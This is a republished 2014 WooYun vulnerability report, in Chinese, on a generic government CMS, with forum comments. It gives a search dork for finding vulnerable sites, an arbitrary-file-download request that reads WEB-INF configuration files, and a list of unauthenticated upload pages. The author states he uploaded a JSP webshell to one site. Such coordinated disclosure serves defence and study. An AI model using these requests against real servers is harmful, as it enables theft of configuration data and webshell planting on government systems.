某政府通用CMS任意文件下载导致webshell

admin 2015年5月1日21:44:37评论316 views字数 250阅读0分50秒阅读模式
摘要

2014-07-18: 细节已通知厂商并且等待厂商处理中
2014-07-21: 厂商已经确认,细节仅向厂商公开
2014-07-31: 细节向核心白帽子及相关领域专家公开
2014-08-10: 细节向普通白帽子公开
2014-08-20: 细节向实习白帽子公开
2014-08-30: 细节向公众公开

漏洞概要 关注数(29) 关注此漏洞

缺陷编号: WooYun-2014-68728

漏洞标题: 某政府通用CMS任意文件下载导致webshell

相关厂商: www.mzgtzy.gov.cn

漏洞作者: 小川某政府通用CMS任意文件下载导致webshell

提交时间: 2014-07-18 16:13

公开时间: 2014-08-30 16:14

漏洞类型: 任意文件遍历/下载

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 任意文件读取利用

2人收藏


漏洞详情

披露状态:

2014-07-18: 细节已通知厂商并且等待厂商处理中
2014-07-21: 厂商已经确认,细节仅向厂商公开
2014-07-31: 细节向核心白帽子及相关领域专家公开
2014-08-10: 细节向普通白帽子公开
2014-08-20: 细节向实习白帽子公开
2014-08-30: 细节向公众公开

简要描述:

任意文件下载导致敏感信息泄露,后台越权访问,任意文件上传

详细说明:

某政府通用CMS任意文件下载导致webshell

漏洞证明:

google搜索找到的任意文件下载:inurl:upload/FileDownload.jsp

下载任意文件请求案例:

http://**.**.**.**/cms/upload/FileDownload.jsp?id=020010040000092515&filepath=/WEB-INF/web.xml&downloadName=web.xml

通过百度搜索存在任意文件上传影响的站点:

http://**.**.**.**/cms/weblawcase/impList.jsp (已经有人上传过jsp,不是我干的)

http://**.**.**.**/cms/weblawcase/impList.jsp

http://**.**.**.**/cms/weblawcase/impList.jsp (这是我干的,请center验证后删除)

http://**.**.**.**/cms/weblawcase/impList.jsp

都是mzgtzy的子域名,一个发布系统控制的。

http://**.**.**.**/cms/weblawcase/impList.jsp

http://**.**.**.**/cms/weblawcase/impList.jsp

http://**.**.**.**/cms/weblawcase/impList.jsp

http://**.**.**.**/cms/weblawcase/impList.jsp

http://**.**.**.**/cms/weblawcase/impList.jsp

http://**.**.**.**/cms/weblawcase/impList.jsp

http://**.**.**.**/cms/weblawcase/impList.jsp

http://**.**.**.**/cms/weblawcase/impList.jsp

**.**.**.**/cms/weblawcase/impList.jsp

http://**.**.**.**/cms/weblawcase/impList.jsp

**.**.**.**/cms/weblawcase/impList.jsp

http://**.**.**.**/cms/weblawcase/impList.jsp

http://**.**.**.**:8090/cms/weblawcase/impList.jsp

http://**.**.**.**/cms/upload/FileDownload.jsp?id=025010550000000432&filepath=WEB-INF/config/applicationContexts-cms.xml&downloadName=web.xml(有任意文件下载漏洞,但是没找到上传)

http://**.**.**.**/cms/upload/FileDownload.jsp?id=025010550000000432&filepath=WEB-INF/config/applicationContexts-cms.xml&downloadName=web.xml(有任意文件下载漏洞,但是没找到上传)

http://**.**.**.**:8720/cms/weblawcase/impList.jsp

**.**.**.**/cms/weblawcase/impList.jsp(已经被某人上传了shell)

修复方案:

限制下载的目录,上传文件格式限制,后台各个页面有很多越权访问,请屏蔽

版权声明:转载请注明来源 小川@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-07-21 09:42

厂商回复:

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-07-16 16:47 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    0

    你关注的白帽子 小川 发表了漏洞 某政府通用CMS任意文件下载导致webshell 2014-07-16

  2. 2014-07-16 16:58 | adm1n ( 普通白帽子 | Rank:216 漏洞数:66 | 只是一个渣渣而已。。。)

    0

    川神不越权了么

  3. 2014-07-16 17:01 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:207 | px1624)

    0

    这次没给小厂商了额,川神,求带!

  4. 2014-07-16 17:05 | 小川 某政府通用CMS任意文件下载导致webshell ( 核心白帽子 | Rank:1627 漏洞数:241 | 一个致力要将乌云变成搞笑论坛的男人)

    0

    @老和尚 能得到大师的关注,小僧甚是光荣,但是大师,cncert去审核你那1000多个注入去了,还哪有时间看我的洞啊,还请大师手下留情。

  5. 2014-07-16 17:30 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )

    0

    @小川 阿弥陀佛 贫僧班门弄斧 还望施主一笑.

  6. 2014-07-16 19:29 | 命运 ( 路人 | Rank:3 漏洞数:2 | 我是来乌云秀智商下限的~~)

    0

    关注的。。都要抓起来。

  7. 2014-07-16 19:50 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    0

    抓起来,妈的,还让不让cnvd休息一会了

  8. 2014-07-16 19:51 | 黑吃黑 ( 普通白帽子 | Rank:165 漏洞数:32 | 不是因为看到了希望才去努力,而是努力了才...)

    0

    你那么吊某党知道吗?

  9. 2014-07-16 21:25 | 魂淡、 ( 路人 | Rank:17 漏洞数:2 | 么么哒)

    0

    越权帝

  10. 2016-03-19 14:42 | 无敌情痴 ( 普通白帽子 | Rank:203 漏洞数:61 | 没有站在安全界顶点的能力,但是也要不断的...)

    1

    膜拜川神

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin